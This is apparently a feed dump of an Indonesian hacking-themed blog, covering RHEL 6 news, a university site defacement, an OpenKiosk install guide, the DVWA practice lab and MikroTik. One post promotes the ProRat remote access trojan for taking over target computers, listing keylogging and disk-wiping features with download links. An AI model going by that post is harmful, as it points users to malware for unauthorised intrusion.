tag:blogger.com,1999:blog-56796662306840067122011-11-28T06:45:00.670+07:00www.kill-9.tk - www.kill-nine.co.nrarianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comBlogger146125tag:blogger.com,1999:blog-5679666230684006712.post-11379633470118123212011-01-29T09:20:00.000+07:002011-01-29T09:28:27.264+07:002011-01-29T09:28:27.264+07:00<p style="text-align: center;"> <img alt="http://bojalinuxer.blogspot.com" class="expando" id="BLOGGER_PHOTO_ID_5538279228833995394" src="http://2.bp.blogspot.com/_2ArRz4Y2WvY/TNvrnZWTGoI/AAAAAAAACds/ZzefwCrJXJk/s400/rhel6.png" border="0" /></p> <p> RHEL6 - Red Hat.Inc, penyedia solusi open source terkemuka didunia, dengan bangga mengumumkan ketersediaan rilis final Red Hat Enterprise Linux 6. Rilis ini adalah rilis yang dinanti-nantikan dari RHEL 6 yang memuat perbaikan-perbaikan dan itu tersedia untuk arsitektur i386, AMD64/Intel64, System z, dan IBM Power (64-bit).</p> <p> Namun, Red Hat mengumumkan bahwa rilis ini tidak akan memberikan dukungan bagi arsitektur Intel Itanium. Selain itu, prosesor POWER5 tidak lagi didukung, hanya CPU POWER6 atau yang lebih tinggi yang akan mendapat dukungan.</p> <p> "Red Hat Enterprise Linux selama bertahun-tahun menjadi platform mission-critical pilihan bagi banyak perusahaan. Pelanggan seperti British Airways, Citi dan NTT Communications telah menjadi mitra terpercaya dalam pengembangan platform Red Hat Enterprise Linux."</p> <p> "Kami sekarang memasuki era enterprise computing di mana fleksibilitas, portabilitas dan interoperabilitas yang lebih penting daripada sebelumnya. Dan hari ini, kami memberikan platform yang dibutuhkan konsumen. Ini selalu menjadi fokus kami".</p> <p> "Apa yang kami berikan lebih terbuka, lebih dapat diandalkan dan lebih komprehensif daripada produk lain di pasaran. Dimasa mendatang,ini adalah platform yang dirancang untuk menghantar pelanggan ke generasi berikutnya dengan virtualisasi dan cloud". - Kata Paul Cormier, executive vice president and president, Products and Technologies di Red Hat, pada <a href="http://www.redhat.com/about/news/prarchive/2010/new-standard.html" target="new">press release</a>.</p> <div style="text-align: center;"> <img alt="http://bojalinuxer.blogspot.com" class="expando" id="BLOGGER_PHOTO_ID_5538279223747647890" src="http://1.bp.blogspot.com/_2ArRz4Y2WvY/TNvrnGZnmZI/AAAAAAAACdk/cPDFVgLsTsY/s400/gdm-rhel6.png" border="0" /><br /></div><p> Yang baru dengan Red Hat Enterprise Linux 6:</p> <ul><li> Peningkatan grafis installer;</li><li> Dukungan untuk file sistem baru (EXT4, XFS, NFS, block discard);</li><li> LVM enhancements;</li><li> Power management yang lebih baik dengan powertop dan tuned;</li><li> Peningkatan PackageKit dan Yum package managers;</li><li> Dukungan yang lebih baik untuk clustering, dengan Corosync Cluster Engine;</li><li> Peningkatan keamanan;</li><li> Pelabelan Network packet dan dukungan untuk IPv6;</li><li> Fungsionalitas Suspend dan resume;</li><li> Dukungan untuk multiple display;</li><li> Driver video Nouveau untuk kartu grafis Nvidia;</li><li> Dukunga Internasionalisasi;</li><li> KDE SC 4.3;</li><li> OpenOffice.org Office Suite 3.1;</li><li> Mozilla Thunderbird 3;</li><li> Mozilla Firefox 3.5;</li><li> Apache 2.2.15;</li><li> MySQL 5.1;</li><li> PostgreSQL 8.4;</li><li> Dokumentasi yang lebih baik;</li><li> Peningkatan dukungan C++;</li><li> Peningkatan Samba;</li><li> Dukungan penuh untuk KVM (Kernel-based Virtual Machine);</li><li> Dukungan Alternative PHP Cache (APC) untuk PHP;</li><li> Penambahan memcached.</li></ul> <p> Bagai manapun distribusi Red Hat Enterprise Linux (RHEL) lebih ditargetkan ke pasar komersial, termasuk mainframe, yang menikmati dukungan teknis selama 7 tahun atas Red Hat setelah perilisan. Versi baru RHEL dilepaskan cukup cepat dan dengan demikian, pengguna dapat meng-upgrade versi yang sedang digunakan ke rilis terbaru secara gratis. Red Hat didistribusikan menjadi empat versi RHEL: RHEL AS (Advanced Server), RHEL ES (edge, ekonomi atau server entry-level), RHEL WS (workstation) dan Red Hat Desktop.</p> <p> Bagi Anda yang berminat mencoba, dapat men-download RHEL 6 beta 2 di sini.</p> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr> <td class="padding_topbottom5px" width="35"> </td> <td> <p class="fontsize14"> <b><a href="https://rhn.redhat.com/network/software/download_isos_full.pxt" target="_blank" title="Download Red Hat Enterprise Linux">Red Hat Enterprise Linux 5.5 (Registration Required)</a></b><br /> <span class="download_smalltext">[iso] [0 KB]</span></p> </td> </tr> <tr> <td class="padding_topbottom5px" width="35"> </td> <td> <p class="fontsize14"> <b><a href="ftp://ftp.redhat.com/pub/redhat/rhel/beta/6Server-beta2/i386/iso/RHEL6.0-20100622.1-Server-i386-DVD1.iso" target="_blank" title="Download Red Hat Enterprise Linux">Red Hat Enterprise Linux 6 Beta 2 (ISO) i386</a></b><br /> <span class="download_smalltext">[iso] [3.40 GB]</span></p> </td> </tr> <tr> <td class="padding_topbottom5px" width="35"> </td> <td> <p class="fontsize14"> <b><a href="ftp://ftp.redhat.com/pub/redhat/rhel/beta/6Server-beta2/x86_64/iso/RHEL6.0-20100622.1-Server-x86_64-DVD1.iso" target="_blank" title="Download Red Hat Enterprise Linux">Red Hat Enterprise Linux 6 Beta 2 (ISO) x86_64</a></b><br /> <span class="download_smalltext">[iso] [3.90 GB]</span></p></td></tr></tbody></table><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1137963347011812321?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/WNLkU3NGRLS88rjN-w5M2tH8uSE/0/da"><img src="http://feedads.g.doubleclick.net/~a/WNLkU3NGRLS88rjN-w5M2tH8uSE/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/WNLkU3NGRLS88rjN-w5M2tH8uSE/1/da"><img src="http://feedads.g.doubleclick.net/~a/WNLkU3NGRLS88rjN-w5M2tH8uSE/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/M_IE-1K1N4E" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/rilis-final-red-hat-enterprise-linux-6.htmltag:blogger.com,1999:blog-5679666230684006712.post-69062201173172982212011-01-28T17:48:00.001+07:002011-01-29T17:53:43.564+07:002011-01-29T17:53:43.564+07:00<div class="pc"><div style="text-align: center;"> <a href="http://webometrics.ipb.ac.id/cms/"><img src="http://i.okezone.com/content/2010/12/31/55/409103/1HJLSVxvyc.jpg" border="1" width="250" /></a> </div><h5 style="text-align: center;">Screenshot web page situs IPB yang di-hack</h5></div><h5 style="font-weight: normal; font-family: arial;"><strong>JAKARTA</strong> - Seorang hacker mengaku bisa menjebol pertahanan di situs resmi <a href="http://webometrics.ipb.ac.id/cms/">Institut Pertanian Bogor (IPB)</a>.<br />Dalam aksinya, sang <em>hacker</em> mengaku tidak berniat untuk mengacak-acak situs tersebut. Hanya saja mereka ingin mengungkapkan jika keamanan jaringan sebuah situs sangatlah penting. Apalagi saat ini diduga telah terjadi perang <em>cyber</em> antara <em>hacker</em> Indonesia dengan Malaysia.<br /><br />"Ada beberapa <em>backdoor</em> yang tertanam di situs <a href="http://webometrics.ipb.ac.id/cms/">ipb.ac.id</a>. Itu tugas admin untuk membersihkan dan mem-<em>patch</em> celah yang berpotensi disusupi <em>hacker</em>," tulis sang hacker dalam pesannya, Jumat (31/12/2010).<br /><br />Memang sang <em>hacker</em> tidak mengacak-acak situs secara keseluruhan. Buktinya konten-konten dalam situs IPB masih bisa diakses. Hanya saja sang <em>hacker</em> bisa menerobos keamanan situs dan menambahkan konten baru ke dalam situs tersebut.<br /><br />Bahkan dalam satu halaman yang dibuat <em>hacker</em> sebagai bukti kemampuannya, yaitu dalam halaman <a href="http://webometrics.ipb.ac.id/cms/">webometrics.ipb.ac.id</a>, dirinya menyematkan sebuah foto yang menggambarkan nasionalisme anak Indonesia.</h5>Note: sampai saat ini defacing page masih ada, silahkan di cek di<br /><a href="http://webometrics.ipb.ac.id/cms/"><span style="font-weight: bold;">http://webometrics.ipb.ac.id/cms/</span></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-6906220117317298221?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/_3Uby4rrkR6x1eYqLCp1Cj9YkKw/0/da"><img src="http://feedads.g.doubleclick.net/~a/_3Uby4rrkR6x1eYqLCp1Cj9YkKw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/_3Uby4rrkR6x1eYqLCp1Cj9YkKw/1/da"><img src="http://feedads.g.doubleclick.net/~a/_3Uby4rrkR6x1eYqLCp1Cj9YkKw/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/uCxhl8_2N6o" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/situs-ipb-mudah-dijebol-hacker.htmltag:blogger.com,1999:blog-5679666230684006712.post-18712787284671511922011-01-19T22:25:00.004+07:002011-01-19T22:37:19.590+07:002011-01-19T22:37:19.590+07:00<!--[if gte mso 9]><xml> <w:worddocument> <w:view>Normal</w:View> <w:zoom>0</w:Zoom> <w:punctuationkerning/> <w:validateagainstschemas/> <w:saveifxmlinvalid>false</w:SaveIfXMLInvalid> <w:ignoremixedcontent>false</w:IgnoreMixedContent> <w:alwaysshowplaceholdertext>false</w:AlwaysShowPlaceholderText> <w:compatibility> <w:breakwrappedtables/> <w:snaptogridincell/> <w:wraptextwithpunct/> <w:useasianbreakrules/> <w:dontgrowautofit/> </w:Compatibility> <w:browserlevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:latentstyles deflockedstate="false" latentstylecount="156"> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ansi-language:#0400; mso-fareast-language:#0400; mso-bidi-language:#0400;} </style> <![endif]--><div style="text-align: center;"><img style="cursor: -moz-zoom-in; width: 286px; height: 175px;" alt="http://imanhermawan.files.wordpress.com/2008/08/screenshot-billclient.png" src="http://imanhermawan.files.wordpress.com/2008/08/screenshot-billclient.png" /></div><p style="text-align: justify;"><span>Here is information on how to install one of the billing program in Linux, namely OpenKiosk: <a href="http://openkiosk.sourceforge.net/">http://openkiosk.sourceforge.net</a>. This program can NOT be used in LTSP.</span> One of the advantages is that the client / workstation can use the operating system Linux, FreeBSD / OpenBSD, and Windows. Billing program is also free. </p> <p class="MsoNormal"><b style="">Terms:</b><br /><span>Client (which Linux) to use KDE (not Gnome)</span><br /><br /><b style=""><span>How To Install</span></b><br /><span class="google-src-text"><b style=""><span>1.</span></b></span><b style=""> Create a special directory to collect all the programs needed, command2 type the following at the console / terminal:</b><span style="color:navy;"> </span><br /><br /><span style="color:red;"><span style="color: rgb(0, 0, 0);">mkdir / downloads</span><br /><span style="color: rgb(0, 0, 0);">cd / downloads</span><br /></span><br /><span class="google-src-text"><b style=""><span>2.</span></b></span><b style=""> Download the following programs into / downloads<span style="color:navy;"></span> </b></p> <p class="MsoNormal">a. <a href="http://prdownloads.sourceforge.net/openkiosk/nodeview-0.8.3.tar.gz?download">Nodeview : for Server</a><span style="text-decoration: underline;"><br /></span></p><p class="MsoNormal"><span style="text-decoration: underline;"></span>b.<a href="http://prdownloads.sourceforge.net/openkiosk/kdex11client-0.3.1b.tar.gz?download"> kdex11client</a> :</p><p class="MsoNormal">c. <a href="http://prdownloads.sourceforge.net/openkiosk/win32lock-0.8.exe?download">Client for Windows :</a><span style="text-decoration: underline;"><br /></span></p><p class="MsoNormal"><span style="text-decoration: underline;"></span><span style=""></span>d.<a href="http://sunsite.rediris.es/mirror/Qt/source/qt-x11-free-3.3.4.tar.bz2">Qt: </a>(for Server &amp; Client)</p><p class="MsoNormal">e. <a href="http://downloads.sleepycat.com/db-4.3.28.NC.tar.gz">BerkeleyDB </a>(for Server &amp; Client)</p> <p class="MsoNormal"><span style=""> </span><br /><b style="">3. Install BerkeleyDB : (di SERVER &amp; CLIENT)<br /></b><br /><span style="color:red;"><span style="color: rgb(0, 0, 0);">cd /downloads</span><br /><span style="color: rgb(0, 0, 0);"> tar xzvf db-4.3.28.NC.tar.gz</span><br /><span style="color: rgb(0, 0, 0);"> cd db-4.3.28.NC</span><br /><span style="color: rgb(0, 0, 0);"> cd build_unix</span><br /><span style="color: rgb(0, 0, 0);"> ../dist/configure</span><br /><span style="color: rgb(0, 0, 0);"> make</span><br /><span style="color: rgb(0, 0, 0);"> make install</span><br /><span style="color: rgb(0, 0, 0);"> cd ..</span><br /><span style="color: rgb(0, 0, 0);"> cd ..</span><br /></span><br /><b style="">4. Install Qt : (SERVER &amp; CLIENT)<br /></b><br /><span style="color:red;"><span style="color: rgb(0, 0, 0);">cd /downloads</span><br /><span style="color: rgb(0, 0, 0);"> bzip2 -d qt-x11-free-3.3.4.tar.bz2</span><br /><span style="color: rgb(0, 0, 0);"> tar xvf qt-x11-free-3.3.4.tar</span><br /><span style="color: rgb(0, 0, 0);"> cd qt-x11-free-3.3.4</span><br /><span style="color: rgb(0, 0, 0);"> ./configure </span><br /></span><br />Qt will ask whether you agree with the contents of his license, <span class="google-src-text">Enter</span> type "yes" and press Enter<br /><br /><span style="color:red;"><span style="color: rgb(0, 0, 0);">make</span><br /><span style="color: rgb(0, 0, 0);"> make install</span><br /><span style="color: rgb(0, 0, 0);"> cd .. </span><br /></span><br /><b style="">5. Install Nodeview (controller) (the SERVER)<br /></b><br /><span style="color:red;"><span style="color: rgb(0, 0, 0);">cd /downloads</span><br /><span style="color: rgb(0, 0, 0);"> tar xzvf nodeview-0.8.3.tar.gz</span><br /><span style="color: rgb(0, 0, 0);"> cd nodeview-0.8.3</span><br /><span style="color: rgb(0, 0, 0);"> ./configure</span><br /><span style="color: rgb(0, 0, 0);"> make</span><br /><span style="color: rgb(0, 0, 0);"> make install</span><br /></span><br />Nodeview then be run by typing / usr / local / bin / nodeview</p> <p class="MsoNormal"><br /><b style="">6. Install kdex11client (the CLIENT)<br /></b><br /><span style="color:red;"><span style="color: rgb(0, 0, 0);">cd /downloads</span><br /><span style="color: rgb(0, 0, 0);"> tar xzvf kdex11client-0.3.1b.tar.gz</span><br /><span style="color: rgb(0, 0, 0);"> cd kdex11client-0.3.1b</span><br /><span style="color: rgb(0, 0, 0);"> ./configure</span><br /><span style="color: rgb(0, 0, 0);"> make</span><br /><span style="color: rgb(0, 0, 0);"> make install</span><br /></span><br /><b style="">7. Run Nodeview<br /></b><br /><span style="color:red;"><span style="color: rgb(0, 0, 0);">/usr/local/bin/nodeview</span><br /></span><br />Nodeview will ask for login to the Administrator. <span>Because we run it the first time,</span> then we can type anything as the password.<br /><br /><b style="">8. Setup Nodeview<br /></b><br />Select the Settings menu - Configuration.<br /><span>Click the tab Workstation,</span><br /><span>Click on SETUP,</span><br /><span>Enter a workgroup name (free of course, eg cafe)</span><br /><span>Click the ADD,</span><br /><span>Click CLOSE,</span><br /><br /><span>Put the computers in your cafe:</span><br /><span>In the "station name", enter the computer name (example: klien1, klien2, etc.)</span><br /><span>In the "IP address", enter the IP address of <span style=""> </span>this computers.</span></p> <p class="MsoNormal">Then click on "ADD / EDIT" to add<br /><br /><span>Close everything, Nodeview will ask for the password for the Administrator, enter up to you.</span> Then run it again Nodeview. Now OpenKiosk program is ready for your use.<br /><span style="font-weight: bold;">Hopefully useful..</span></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1871278728467151192?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/jPgwxQgHu0LQ22wK6QlfXA3fnqU/0/da"><img src="http://feedads.g.doubleclick.net/~a/jPgwxQgHu0LQ22wK6QlfXA3fnqU/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/jPgwxQgHu0LQ22wK6QlfXA3fnqU/1/da"><img src="http://feedads.g.doubleclick.net/~a/jPgwxQgHu0LQ22wK6QlfXA3fnqU/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/B9hdaggp98Y" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/installing-linux-billing.htmltag:blogger.com,1999:blog-5679666230684006712.post-9830604645152301582011-01-19T19:25:00.003+07:002011-01-20T14:28:06.760+07:002011-01-20T14:28:06.760+07:00<div class="post-body entry-content"><div style="text-align: justify;"> <a href="http://3.bp.blogspot.com/_vzHp3fW2PNc/SudpRZd4vqI/AAAAAAAABNQ/VikDLD6D28M/s1600-h/SP32-20091028-044126.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 149px; height: 100px;" src="http://3.bp.blogspot.com/_vzHp3fW2PNc/SudpRZd4vqI/AAAAAAAABNQ/VikDLD6D28M/s200/SP32-20091028-044126.jpg" alt="" id="BLOGGER_PHOTO_ID_5397398426041761442" border="0" /></a> <span><span style="font-family:arial;"><span style="font-size:100%;"><a href="http://sourceforge.net/projects/dvwa/files/dvwa-1.0.6.zip"><span style="font-weight: bold;">Damn Vulnerable Web Application (DVWA)</span></a> is a collection of web hacking tool based on PHP / mySQL.</span></span></span> <span><span style="font-family:arial;"><span style="font-size:100%;">DVWA may be an option for beginners to learn web hacking web hacking techniques from scratch.</span></span></span> <span> <span style="font-family:arial;"><span style="font-size:100%;">Various techniques web hacking attacks can be obtained from this tool.</span></span></span> <span><span style="font-family:arial;"><span style="font-size:100%;">Besides easy to use, lightweight and complete, DVWA run through a local server (localhost) using WAMP / XAMP / LAMP and others.</span></span></span><br /></div> <span class="fullpost"><br /></span> <div style="text-align: justify;"> <span style="font-family:arial;"><span style="font-size:100%;"></span></span><span><span style="font-weight: bold;"><span style="font-family:arial;"><span style="font-size:100%;">DVWA include some web hacking tools such as:</span></span></span></span><br /><br /><span><span class="google-src-text" style="direction: ltr; text-align: left;"><span style="font-family:arial;"><span style="font-size:100%;"></span></span></span><span style="font-family:arial;"><span style="font-size:100%;">- SQL Injection</span></span></span> <span style="font-family:arial;"><span style="font-size:100%;"><br /></span></span> <span><span class="google-src-text" style="direction: ltr; text-align: left;"><span style="font-family:arial;"><span style="font-size:100%;"></span></span></span><span style="font-family:arial;"><span style="font-size:100%;">- XSS (Cross Site Scripting)</span></span></span> <span style="font-family:arial;"><span style="font-size:100%;"><br /></span></span> <span><span class="google-src-text" style="direction: ltr; text-align: left;"><span style="font-family:arial;"><span style="font-size:100%;"></span></span></span><span style="font-family:arial;"><span style="font-size:100%;">- LFI (Local File Inclusion)</span></span></span> <span style="font-family:arial;"><span style="font-size:100%;"><br /></span></span> <span><span class="google-src-text" style="direction: ltr; text-align: left;"><span style="font-family:arial;"><span style="font-size:100%;"></span></span></span><span style="font-family:arial;"><span style="font-size:100%;">- RFI (Remote File Inclusion)</span></span></span> <span style="font-family:arial;"><span style="font-size:100%;"><br /></span></span> <span><span class="google-src-text" style="direction: ltr; text-align: left;"><span style="font-family:arial;"><span style="font-size:100%;"></span></span></span> <span style="font-family:arial;"><span style="font-size:100%;">- Command Execution</span></span></span> <span style="font-family:arial;"><span style="font-size:100%;"><br /></span></span> <span><span class="google-src-text" style="direction: ltr; text-align: left;"><span style="font-family:arial;"><span style="font-size:100%;"></span></span></span><span style="font-family:arial;"><span style="font-size:100%;">- Upload Script</span></span></span> <span style="font-family:arial;"><span style="font-size:100%;"><br /></span></span> <span><span style="font-family:arial;"><span style="font-size:100%;">- Login Brute Force</span></span></span><br /><br /><span><span style="font-family:arial;"><span style="font-size:100%;"><a href="http://sourceforge.net/projects/dvwa/files/dvwa-1.0.6.zip"><span style="font-weight: bold;">Download DVWA</span></a></span></span></span><span style="font-family:arial;"><span style="font-size:100%;"><br /></span></span></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-983060464515230158?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/F76AGGgYLSse1kdAUO8FKc-MBns/0/da"><img src="http://feedads.g.doubleclick.net/~a/F76AGGgYLSse1kdAUO8FKc-MBns/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/F76AGGgYLSse1kdAUO8FKc-MBns/1/da"><img src="http://feedads.g.doubleclick.net/~a/F76AGGgYLSse1kdAUO8FKc-MBns/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/UBYKRBIyVOs" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/dvwa-web-hacking.htmltag:blogger.com,1999:blog-5679666230684006712.post-41141581787916210342011-01-15T09:35:00.002+07:002011-01-21T10:21:00.917+07:002011-01-21T10:21:00.917+07:00<div class="post-body entry-content"><div style="text-align: justify; font-family: arial;"> <a href="http://1.bp.blogspot.com/_vzHp3fW2PNc/S0VFctWfUhI/AAAAAAAABgA/AaOHGs0SNjk/s1600-h/SP32-20100107-092211.jpg"><span style="font-size:100%;"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 151px; height: 122px;" src="http://1.bp.blogspot.com/_vzHp3fW2PNc/S0VFctWfUhI/AAAAAAAABgA/AaOHGs0SNjk/s200/SP32-20100107-092211.jpg" alt="" id="BLOGGER_PHOTO_ID_5423817685750206994" border="0" /></span></a><span><span style="font-size:100%;"><span style="font-weight: bold;"><a href="http://translate.googleusercontent.com/translate_c?hl=id&amp;sl=id&amp;tl=en&amp;u=http://www.prorat.net/&amp;rurl=translate.google.co.id&amp;usg=ALkJrhhf0K592kRTwmeaUIBLfAcidNk4Zw"></a></span><a style="font-weight: bold;" href="http://www.prorat.net">Prorat</a> is one of RAT (Remote Administration Tools) are widely used to take over the computer system.</span></span> <span><span style="font-size:100%;">Tool made by PRO Group, a group of Turkish hackers community, can be used as a tool Hacking computers in a network.</span></span> <span><span style="font-size:100%;">Use of </span></span><span><span style="font-size:100%;"><a style="font-weight: bold;" href="http://www.prorat.net/">Prorat</a> </span></span><span><span style="font-size:100%;">quite simple, you simply enter the IP (Internet Protocol) is the target computer and then go through one open port.</span></span> <span><span style="font-size:100%;">The hardest part is finding where an open port.</span></span> <span><span style="font-size:100%;">But you can use a variety of network analysis tools such as nmap, Ethercap, LookHost, etc..</span></span> <span style="font-size:100%;"><br /></span> </div> <span class="fullpost"><span style=";font-family:arial;font-size:100%;" ><br /><a href="http://1.bp.blogspot.com/_vzHp3fW2PNc/S0VFl7cOGeI/AAAAAAAABgI/rMp8Fos_0tw/s1600-h/SP32-20100107-092257.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 238px;" src="http://1.bp.blogspot.com/_vzHp3fW2PNc/S0VFl7cOGeI/AAAAAAAABgI/rMp8Fos_0tw/s320/SP32-20100107-092257.jpg" alt="" id="BLOGGER_PHOTO_ID_5423817844151163362" border="0" /></a></span></span><span><span style="font-weight: bold;"><br />Here are the features provided by PRORAT:</span></span><br /><span><span class="google-src-text" style="direction: ltr; text-align: left;"></span> - Remote Control</span><br /><span><span class="google-src-text" style="direction: ltr; text-align: left;"></span>- Viewing System Info, application running and the Task Manager</span><br /><span><span class="google-src-text" style="direction: ltr; text-align: left;"></span>- Add process, file, or download files</span><br /><span><span class="google-src-text" style="direction: ltr; text-align: left;"></span> - Admin FTP</span><br /><span><span class="google-src-text" style="direction: ltr; text-align: left;"></span>- Format the HDD (hard disk damage)</span><br /><span><span class="google-src-text" style="direction: ltr; text-align: left;"></span>- Remotely download</span><br /><span><span class="google-src-text" style="direction: ltr; text-align: left;"></span>- Running MS-DOS, Batch Script, VBScript</span><br /><span><span class="google-src-text" style="direction: ltr; text-align: left;"></span>- Adding a Registry Entry</span><br /><span><span class="google-src-text" style="direction: ltr; text-align: left;"></span>- Keylogger: Password Recording</span><br /><span><span class="google-src-text" style="direction: ltr; text-align: left;"></span>- Make Screnshoot, see your Windows desktop instantly</span><br /><span><span class="google-src-text" style="direction: ltr; text-align: left;"></span>- Send messages and chat</span><br /><span><span class="google-src-text" style="direction: ltr; text-align: left;"></span>- Shutdown, Restart, Control Panel, IExplorer, Registry, Printer and Online Controls</span><br /><br /><a href="http://translate.googleusercontent.com/translate_c?hl=id&amp;sl=id&amp;tl=en&amp;u=http://www.prorat.net/&amp;rurl=translate.google.co.id&amp;usg=ALkJrhhf0K592kRTwmeaUIBLfAcidNk4Zw"><span><span style="font-size:100%;"></span></span></a><span><span style="font-size:100%;"><a style="font-weight: bold;" href="http://www.prorat.net/">Download Prorat</a></span></span><br /><a style="font-weight: bold;" href="http://www.ziddu.com/download/8058693/ProRat_v1.9.zip">or Download Prorat at here</a><br /><span><a href="http://www.ziddu.com/download/8058693/ProRat_v1.9.zip"><span style="font-weight: bold;"></span></a></span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-4114158178791621034?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/xcJBZC8VemY7dgY_8BGtkmkr_d8/0/da"><img src="http://feedads.g.doubleclick.net/~a/xcJBZC8VemY7dgY_8BGtkmkr_d8/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/xcJBZC8VemY7dgY_8BGtkmkr_d8/1/da"><img src="http://feedads.g.doubleclick.net/~a/xcJBZC8VemY7dgY_8BGtkmkr_d8/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/rrrlUcvC85M" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/remote-administrator-with-prohat.htmltag:blogger.com,1999:blog-5679666230684006712.post-46631853331279647762011-01-12T09:44:00.001+07:002011-01-29T09:47:05.507+07:002011-01-29T09:47:05.507+07:00<div style="text-align: center;"><img style="width: 266px; height: 166px;" alt="http://www.invasaohacking.com/wp-content/uploads/2010/04/Mikrotik-Hotspot.jpeg" src="http://www.invasaohacking.com/wp-content/uploads/2010/04/Mikrotik-Hotspot.jpeg" /></div><div style="text-align: left;"><b><br /></b><div style="text-align: left;"><b>MikroTikRouterOS™</b> merupakansistemoperasiLinuxbase yang diperuntukkan sebagai network router.Didesain untuk memberikan kemudahan bagi penggunanya. Administrasinyabisa dilakukan melalui Windowsapplication (WinBox). Selain itu instalasi dapat dilakukan padastandard computer PC. PC yang akan dijadikan router mikrotikpun tidakmemerlukan resource yang cukup besar untuk penggunaan standard,misalnya hanya sebagai gateway.Untuk keperluan beban yang besar ( network yang kompleks, routingyang rumit dll) disarankan untuk mempertimbangkan pemilihan resourcePC yang memadai.<a name="more"></a></div></div> <div><a href="http://www.blogger.com/post-edit.g?blogID=5776147656938756547&amp;postID=7763048794989162765" name="more"></a></div> <p>Fasilitaspada mikrotik antara lain sebagai berikut : </p><ul><li> <div align="JUSTIFY" lang="id-ID">Protokoll routing RIP, OSPF, BGP.</div> </li><li> <div align="JUSTIFY" lang="id-ID">Statefull firewall</div> </li><li> <div align="JUSTIFY">Hotspot for Plug-and-Play access</div> </li><li>remote winbox GUI admin<br /></li></ul> <div align="JUSTIFY" lang="id-ID">Tutorial lengkap hotspot MikroTik bisa di download <b><a href="http://www.ziddu.com/download/12195585/hotspot_mikrotik.pdf.html">disini</a></b></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-4663185333127964776?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/S2hOfWpUnfPIAeklPtyLYwpFQrw/0/da"><img src="http://feedads.g.doubleclick.net/~a/S2hOfWpUnfPIAeklPtyLYwpFQrw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/S2hOfWpUnfPIAeklPtyLYwpFQrw/1/da"><img src="http://feedads.g.doubleclick.net/~a/S2hOfWpUnfPIAeklPtyLYwpFQrw/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/rBeWYYRD7Uk" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2011/01/membangun-hotspot-dengan-mikrotik.htmltag:blogger.com,1999:blog-5679666230684006712.post-14145537831792517882011-01-11T09:55:00.000+07:002011-01-29T09:56:39.297+07:002011-01-29T09:56:39.297+07:00<p>Panduan ini dibuat untuk memberikan pemahaman menggunakan nano dalam membuat atau mengedit sebuah file dalam sistem <a href="http://en.wikipedia.org/wiki/Unix-like">Unix-like</a>.</p> <p>1. Tentang Nano</p> <p><a href="http://en.wikipedia.org/wiki/Nano_%28text_editor%29">Nano</a> merupakan sebuah aplikasi editor berbasis teks untuk <a href="http://en.wikipedia.org/wiki/Unix">Unix</a> dan sistem Unix-like. Ini adalah tiruan dari <a 